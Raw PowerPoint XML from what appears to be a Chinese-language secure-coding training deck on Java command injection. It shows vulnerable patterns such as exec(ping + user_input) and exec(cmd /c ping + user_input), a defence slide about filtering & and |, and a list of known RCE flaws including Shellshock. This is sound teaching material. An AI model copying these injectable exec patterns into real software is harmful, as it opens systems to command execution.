      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3347379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p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1731532" y="202558"/>
            <a:ext cx="6884754" cy="584777"/>
            <a:chOff x="207532" y="202557"/>
            <a:chExt cx="6884754" cy="584777"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="394298" y="202557"/>
              <a:ext cx="758165" cy="584777"/>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="284360"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
                </a:rPr>
                <a:t>5</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="284360"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4"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r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="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危险的系统命令</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="组合 20"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="207532" y="454200"/>
              <a:ext cx="213311" cy="81492"/>
              <a:chOff x="207532" y="454200"/>
              <a:chExt cx="213311" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="6"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7"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8" name="组合 21"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1123569" y="454200"/>
              <a:ext cx="213302" cy="81492"/>
              <a:chOff x="1123569" y="454200"/>
              <a:chExt cx="213302" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="9"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10"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sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1362075" y="977421"/>
            <a:ext cx="10344149" cy="2862322"/>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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>Java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>提供执行外部操作系统命令的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>java.lang.runtime.Runtime.getRuntime</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>java.lang.runtime.Runtime.exec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="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ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>如果提交给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>的参数是用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>完全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>可控的，并且没有进行过滤，那么就一定存在命令注入漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>如果只是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>部分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>参数可控，那么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>可能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>会存在漏洞，因为该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>本身不解释</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>元字符，攻击是不会成功的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7441993" y="1373893"/>
            <a:ext cx="4313745" cy="4105274"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3346701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738664"/>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命令注入漏洞案例</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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="133635" y="1482490"/>
            <a:ext cx="4571429" cy="1476190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="628935" y="3229591"/>
            <a:ext cx="5371429" cy="1933333"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628935" y="1016812"/>
            <a:ext cx="4423006" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>用户部分参数可控：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>exec(ping +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>user_input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6458235" y="1016812"/>
            <a:ext cx="5120312" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>用户部分参数可控：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>exec(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t> /c ping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>user_input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6186419" y="1481577"/>
            <a:ext cx="4819048" cy="1438095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6991349" y="3229591"/>
            <a:ext cx="3488787" cy="3342659"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2046342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1569660"/>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ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>如何防范命令注入漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="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过滤用户输入中敏感字符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>: &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>|</a:t>
            </a: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sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>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参数字符串规则</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="422350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p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1731532" y="202558"/>
            <a:ext cx="6884754" cy="584777"/>
            <a:chOff x="207532" y="202557"/>
            <a:chExt cx="6884754" cy="584777"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="394298" y="202557"/>
              <a:ext cx="758165" cy="584777"/>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="284360"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
                </a:rPr>
                <a:t>6</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="284360"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4"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r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="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躺枪的第三方组件</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="组合 20"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="207532" y="454200"/>
              <a:ext cx="213311" cy="81492"/>
              <a:chOff x="207532" y="454200"/>
              <a:chExt cx="213311" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="6"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7"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8" name="组合 21"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1123569" y="454200"/>
              <a:ext cx="213302" cy="81492"/>
              <a:chOff x="1123569" y="454200"/>
              <a:chExt cx="213302" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="9"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10"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sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1362075" y="977421"/>
            <a:ext cx="10344149" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>Struts2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>远程代码执行漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>ImageMagick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>远程代码执行漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="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ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>破壳漏洞（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>CVE-2014-6271</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="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ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>。。。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="https://timgsa.baidu.com/timg?image&amp;quality=80&amp;size=b9999_10000&amp;sec=1496904656082&amp;di=44d104a0c2096df7c429ee60c61b57be&amp;imgtype=0&amp;src=http%3A%2F%2Fstatic.leiphone.com%2Fuploads%2Fnew%2Farticle%2F600_600%2F201410%2F5430d33f0067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666" y="3246860"/>
            <a:ext cx="3685593" cy="24655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s0.bdstatic.com/70cFuHSh_Q1YnxGkpoWK1HF6hhy/it/u=352936753,3448606359&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463" y="3339440"/>
            <a:ext cx="332422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496909178667&amp;di=3a3da2b90c2ad7ecdcac2a63d35e30d3&amp;imgtype=0&amp;src=http%3A%2F%2Fimg.mp.itc.cn%2Fupload%2F20160506%2F07757bba69db42feabe8fbf9e25ee8b6_t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6191" y="3399622"/>
            <a:ext cx="2846999" cy="213524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610224" y="915864"/>
            <a:ext cx="6096000" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
